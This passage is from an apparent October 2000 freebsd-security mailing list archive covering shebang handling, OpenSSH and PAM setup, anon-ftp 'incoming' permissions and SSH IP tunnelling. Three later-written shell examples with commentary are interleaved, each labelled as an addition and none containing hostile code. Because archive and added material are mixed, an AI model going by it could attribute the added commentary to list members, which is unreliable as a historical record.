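        printf 'R$* < @ localhost > $*   $#procmail $@ /etc/procmail/filter.rc $: $1 < @ localhost . procmail . > $2\n'
        printf 'R$* < @ localhost . > $*   $#procmail $@ /etc/procmail/filter.rc $: $1 < @ localhost . procmail . > $2\n'
        printf 'R$* < @ localhost . procmail > $*\t$1 < @ $2 . > $3\n'
    } > "$cf"
    printf '%s\n' "$cf"
}

cf=$(write_sample_cf)
find_untabbed_rules "$cf"                              # reports lines 2 and 3
echo "untabbed rules: $(count_untabbed_rules "$cf")"   # 2
rm -f "$cf"
```

To see whether an editor has quietly turned tabs into spaces in a real file, `sed -n l /etc/sendmail.cf` prints each line with tabs shown as `\t`; the check above is the same idea applied only to R lines.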
From: Peter van Dijk To: freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001011161531.C52149@vuurwerk.nl> Mail-Followup-To: Peter van Dijk , freebsd-security@FreeBSD.ORG References: <20001010214332.G25121@149.211.6.64.reflexcom.com> <20001011080628.F387D1F22@static.unixfreak.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001011080628.F387D1F22@static.unixfreak.org>; from dima@unixfreak.org on Wed, Oct 11, 2000 at 01:06:28AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 11, 2000 at 01:06:28AM -0700, Dima Dorfman wrote: [snip] > "Me too." It was my impression that the whole '#!/path/to/shell' > thing started when people expressed a desire to use csh for their > scripts, so someone hacked execve in their kernel to look for '#' as > the first byte in the file, and if it's there, execute whatever > command follows. Since not all kernels had this hack, the script > would still get executed with sh on some systems, so it was decided > that the sh comment character be used to keep the old hosts happy. It requires #!, not just #. Greetz, Peter. 
-- [ircoper] petervd@vuurwerk.nl - Peter van Dijk / Hardbeat [student] Undernet:#groningen/wallops | IRCnet:/#alliance [developer] EFnet:#qmail _____________ [disbeliever - the world is backwards] (__VuurWerk__(--*- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 11 8: 9:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from crash.ab.videon.ca (crash.ab.videon.ca [206.75.216.220]) by hub.freebsd.org (Postfix) with ESMTP id 2C81037B66D for ; Wed, 11 Oct 2000 08:09:48 -0700 (PDT) Received: from rolf-e-laptop.meccamediagroup.com (firewall.meccamediagroup.com [24.108.76.66]) by crash.ab.videon.ca (8.9.2/8.9.2) with ESMTP id JAA03112 for ; Wed, 11 Oct 2000 09:09:46 -0600 (MDT) Message-Id: <5.0.0.25.2.20001011090329.00a799a8@127.0.0.1> X-Sender: redwards/firewall.meccamediagroup.com@127.0.0.1 X-Mailer: QUALCOMM Windows Eudora Version 5.0 Date: Wed, 11 Oct 2000 09:09:54 -0600 To: freebsd-security@FreeBSD.ORG 
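The behaviour the thread is circling, the kernel honouring the '#!' line on execve while a shell either treats it as a comment (when told "sh script") or runs the file itself when execve returns ENOEXEC, can be observed directly. The script below is an added example and not code posted by anyone in the thread. It assumes a POSIX /bin/sh, a temporary directory that permits execution, and a shell with the usual ENOEXEC fallback (bash, dash and FreeBSD's sh all have it). The case of an interpreter that is itself a '#!' script is left out on purpose, because it differs between systems: FreeBSD rejects it with ENOEXEC, as Robert describes, while Linux accepts a few levels of nesting.

```shell
#!/bin/sh
# Added example for the '#!' discussion; not code from any message in the thread.
# Assumes a POSIX /bin/sh and a writable ${TMPDIR:-/tmp} that permits execution.

# Write an executable file whose body is plain sh. With a non-empty $1 the
# first line is "#!$1"; with an empty $1 there is no '#!' line at all.
# Prints the file name.
make_script() {
    f=$(mktemp "${TMPDIR:-/tmp}/shebang.XXXXXX") || return 1
    if [ -n "$1" ]; then
        printf '#!%s\necho ran-by-sh\n' "$1" > "$f"
    else
        printf 'echo ran-by-sh\n' > "$f"
    fi
    chmod +x "$f"
    printf '%s\n' "$f"
}

# Case 1, the execve path: the kernel reads the '#!' line and execs that
# interpreter. When it does not exist, execve fails with ENOENT, the calling
# shell reports "bad interpreter" or "not found", and nothing is run.
exec_bogus_interp() {
    f=$(make_script /nonexistent/interp) || return 1
    rc=0; out=$("$f" 2>/dev/null) || rc=$?
    rm -f "$f"
    if [ "$rc" -ne 0 ] && [ -z "$out" ]; then
        echo execve-refused
    else
        echo "ran:$out"
    fi
}

# Case 2, "sh script": the interpreter opens the file as text, so the '#!'
# line is nothing but a comment to it and a csh-tagged file runs under sh.
run_with_sh() {
    f=$(make_script /bin/csh) || return 1
    rc=0; out=$(/bin/sh "$f" 2>/dev/null) || rc=$?
    rm -f "$f"
    echo "${out:-failed:$rc}"
}

# Case 3, the ENOEXEC fallback: no '#!' line and no binary magic, so the
# kernel returns ENOEXEC; instead of failing, the invoking shell runs the
# file as a script in its own dialect. This is the shell-side behaviour the
# thread is questioning.
run_noexec_fallback() {
    f=$(make_script "") || return 1
    rc=0; out=$("$f" 2>/dev/null) || rc=$?
    rm -f "$f"
    echo "${out:-failed:$rc}"
}

echo "bogus interpreter, run as ./f : $(exec_bogus_interp)"
echo "'#!/bin/csh' file, run as sh f: $(run_with_sh)"
echo "no '#!' line, run as ./f      : $(run_noexec_fallback)"
```

Run it as `./shebang_demo.sh` so that execve, not the shell's own file reader, sees the test files. Case 1 fails through the kernel's error and the shell does not try to help; case 2 is why a '#!/bin/csh' script fed to "sh" runs as sh; case 3 is the fallback that makes a file with a missing '#!' line run in whatever shell you happen to be typing into, which is the part of the behaviour that is "probably wrong" when the interpreter line was bad rather than absent.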
From: Rolf Edwards Subject: FreeBSD 4.1.1 and secure telnet Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am setting up a new box to replace an old 3.1 machine, and I would like to set up some method of telnet using SSH. I seem to have managed to set up OpenSSH 2.2.0p1, but it gives console messages such as "no modules loaded for 'sshd' service" and "fatal: PAM session setup failed: Permission denied" when I try to connect. OpenSSH 2.1.1 installed via the ports collection seems to work. The client software that would be used is Secure CRT. The real question, is what should I be using OpenSSH 2.1.1, 2.2.0p1 or ssh2-2.3.0? Rolf To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 11 8:17:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from bart.acs.nmu.edu (bart.acs.nmu.edu [198.110.193.8]) by hub.freebsd.org (Postfix) with ESMTP id 2662B37B502 for ; Wed, 11 Oct 2000 08:17:18 -0700 (PDT) Received: from wag2.resnet.nmu.edu (wag2.resnet.nmu.edu [204.38.56.104]) by bart.acs.nmu.edu (8.11.1/8.11.1) with SMTP id e9BFH9W24749 for ; Wed, 11 Oct 2000 11:17:09 -0400 (EDT) 
From: Chris Jesseman Date: Wed, 11 Oct 2000 15:18:47 GMT Message-ID: <20001011.15184774@wag2.resnet.nmu.edu> Subject: FreeBSD 4.1.1 and secure telnet To: freebsd-security@FreeBSD.ORG X-Mailer: Mozilla/3.0 (compatible; StarOffice/5.2;Win32) X-Priority: 3 (Normal) MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
Rolf,

My 4.1 -STABLE came default install with ssh1 and as long as it's enabled in inetd it works fine. Is this not true with 4.1.1?

Regards,
Chris Jesseman

I am setting up a new box to replace an old 3.1 machine, and I would like to set up some method of telnet using SSH.

I seem to have managed to set up OpenSSH 2.2.0p1, but it gives console messages such as "no modules loaded for 'sshd' service" and "fatal: PAM session setup failed: Permission denied" when I try to connect.

OpenSSH 2.1.1 installed via the ports collection seems to work. The client software that would be used is Secure CRT.

The real question, is what should I be using OpenSSH 2.1.1, 2.2.0p1 or ssh2-2.3.0?

Rolf
From owner-freebsd-security Wed Oct 11 8:22:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id 7506E37B502 for ; Wed, 11 Oct 2000 08:22:34 -0700 (PDT) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id LAA44976 for ; Wed, 11 Oct 2000 11:22:28 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: Date: Wed, 11 Oct 2000 11:22:27 -0400 To: freebsd-security@freebsd.org
From: Garance A Drosihn Subject: setup anon-ftp without incoming directory Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org When installing freebsd, one has the option to setup anonymous ftp. I do provide a number of files via anonymous ftp, so I want to set that up. In that initial setup, it seems that you must have some 'incoming' directory. I tried to leave that field blank in the dialog, and I still got an 'incoming' directory which was world writable. Usually I remember to go back and remove that, but I forgot on some recent install (installing 'stable', a few months ago). Have there been any changes to the anon-ftp setup which would allow one to specify NO incoming directory recently? If not, that might be a nice change to make... --- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 11 10:21:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from secure.smtp.email.msn.com (cpimssmtpu07.email.msn.com [207.46.181.28]) by hub.freebsd.org (Postfix) with ESMTP id C202A37B502 for ; Wed, 11 Oct 2000 10:21:09 -0700 (PDT) Received: from x86nts4 - 216.103.48.12 by email.msn.com with Microsoft SMTPSVC; Wed, 11 Oct 2000 10:20:14 -0700 Message-ID: <00cc01c033a8$a9c70a50$fd01a8c0@pacbell.net> From: "John Howie" To: , "Mike Thompson" References: <4.3.2.7.2.20001008220611.085d2f00@mail.atomz.com> Subject: Re: Encrypted IP tunneling solution Date: Wed, 11 Oct 2000 10:28:24 -0700 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----- Original Message ----- 
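Whatever the installer does with the 'incoming' field, the thing worth verifying afterwards is that nothing under the anonymous-ftp root is world-writable. The following is an added example, not from the original message: it lists world-writable directories under a given root, clears the other-write bit on them, and builds a constructed throw-away tree (a root with pub/ and a 1777 incoming/, resembling what the post describes) so it can be exercised without touching a real ftp area. The path /var/ftp in the final comment is an assumption about where the anon-ftp root lives.

```shell
#!/bin/sh
# Added example: audit an anonymous-ftp tree for world-writable directories.
# Not part of the original message. Uses only find, chmod and mktemp.

# List directories under $1 that have the other-write bit set, one per line.
find_world_writable_dirs() {
    find "$1" -type d -perm -002 -print
}

# Count them; 0 is what you want on a server that should not accept uploads.
count_world_writable_dirs() {
    find_world_writable_dirs "$1" | wc -l | tr -d ' '
}

# Clear the other-write bit on every such directory (deletes nothing).
fix_world_writable_dirs() {
    find "$1" -type d -perm -002 -exec chmod o-w {} +
}

# Build a constructed tree resembling a fresh anon-ftp setup; print its path.
make_sample_ftp_root() {
    root=$(mktemp -d "${TMPDIR:-/tmp}/ftproot.XXXXXX") || return 1
    mkdir -p "$root/pub" "$root/incoming"
    chmod 755 "$root" "$root/pub"
    chmod 1777 "$root/incoming"    # the world-writable 'incoming' the post describes
    printf '%s\n' "$root"
}

root=$(make_sample_ftp_root)
echo "before: $(count_world_writable_dirs "$root") world-writable dir(s)"   # 1
find_world_writable_dirs "$root"
fix_world_writable_dirs "$root"
echo "after:  $(count_world_writable_dirs "$root") world-writable dir(s)"   # 0
rm -rf "$root"
# Real use (path assumed): find_world_writable_dirs /var/ftp
```

Removing the write bit rather than the directory keeps the check idempotent and harmless if something legitimately lives there; if uploads are never wanted, deleting the directory after the audit is the cleaner end state.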
From: "Mike Thompson" To: Sent: Sunday, October 08, 2000 10:56 PM Subject: Encrypted IP tunneling solution > I've created a fairly simple little application called stun that > essentially combines the functionality of nos-tun with SSH. Stun does for > IP tunneling what sftp does for FTP -- it makes it trivial to set up the > highly secure tunneling of raw IP packets between any two FreeBSD systems > that have SSH and tunneling devices (/dev/tunXX) enabled. [stuff deleted] > BTW, my ultimate goal behind this little application is to get it working > with Windows clients running SSH protocols where it can serve as a very > simple, but secure VPN solution. As one might expect, it has proven to be > much easier to write the FreeBSD/Unix side of things than the Windows side > where a virtual NDIS VxD driver or some similar beast will have to be > implemented. Actually, it might not be as hard as you think. I wrote an IP tunnelling interface for an X.25 (remember that?) card for SunOS 4.X and ported a large chunk of it to Windows NT 3.1 way back. The way I wrote it was to have the tunnelling code running in user space and have that access the dummy interface in the kernel. Sure it was slower than a pure kernel solution but back then the graphics was all in user space too. I might have some free time coming up so let me know if you need help. I'll see if I can find the code. > Mike Thompson > mike@atomz.com > CTO/Co-Founder Atomz.com john... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 11 12:46:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id AC0E737B502 for ; Wed, 11 Oct 2000 12:46:07 -0700 (PDT) Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id MAA07814; Wed, 11 Oct 2000 12:46:28 -0700 (PDT) Date: Wed, 11 Oct 2000 12:46:28 -0700 
From: Kris Kennaway To: Rolf Edwards Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 4.1.1 and secure telnet Message-ID: <20001011124628.D7729@citusc17.usc.edu> References: <5.0.0.25.2.20001011090329.00a799a8@127.0.0.1> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <5.0.0.25.2.20001011090329.00a799a8@127.0.0.1>; from redwards@meccamediagroup.com on Wed, Oct 11, 2000 at 09:09:54AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
On Wed, Oct 11, 2000 at 09:09:54AM -0600, Rolf Edwards wrote:
> I am setting up a new box to replace an old 3.1 machine, and I would like
> to set up some method of telnet using SSH.
>
> I seem to have managed to set up OpenSSH 2.2.0p1, but it gives console
> messages such as "no modules loaded for 'sshd' service" and "fatal: PAM
> session setup failed: Permission denied" when I try to connect.

Sounds like you're using the 'portable' version, not from ports. It's expecting a line in /etc/pam.conf to tell it how to authenticate.

> OpenSSH 2.1.1 installed via the ports collection seems to work. The client
> software that would be used is Secure CRT.
>
> The real question, is what should I be using OpenSSH 2.1.1, 2.2.0p1 or
> ssh2-2.3.0?

The version which comes with FreeBSD 4.1 or later. This one doesn't support PAM though.
Kris
From owner-freebsd-security Wed Oct 11 13: 4: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id E0DCE37B502 for ; Wed, 11 Oct 2000 13:03:56 -0700 (PDT) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id PAA16750; Wed, 11 Oct 2000 15:03:51 -0500 (CDT) (envelope-from jeff-ml@mountin.net) Received: from dial-71.max1.wa.cyberlynk.net(207.227.118.71) by peak.mountin.net via smap (V1.3) id sma016748; Wed Oct 11 15:03:25 2000 Message-Id: <4.3.2.20001011145807.00b85580@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Version 4.3 Date: Wed, 11 Oct 2000 15:03:30 -0500 To: Dragos Ruiu , Robert.Watson@peak.mountin.net From: "Jeffrey J. Mountin" Subject: Re: ncurses buffer overflows (fwd) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <0010102350400T.40602@smp.kyx.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
At 11:46 PM 10/10/00 -0700, Dragos Ruiu wrote:
CC's trimmed
>On Tue, 10 Oct 2000, Robert Watson wrote:
> >The general gist is the following: shells
> > (especially when running in single-user mode for some reason) will tend to
> > execute shell scripts themselves, rather than using the interpreter
> > defined in the file (not in multi-user mode?).
>
>This behaviour seems to make sense for single user mode,
>where you may have dropped down to with intent of repairing
>things. Not all the partitions may be mounted and those
>other shells may not be available....

Don't normally run shell scripts in single user mode, but all the system shells are in /bin and should be available. Always make sure to add ksh in there as well. The other day made a mistake and did a 'sh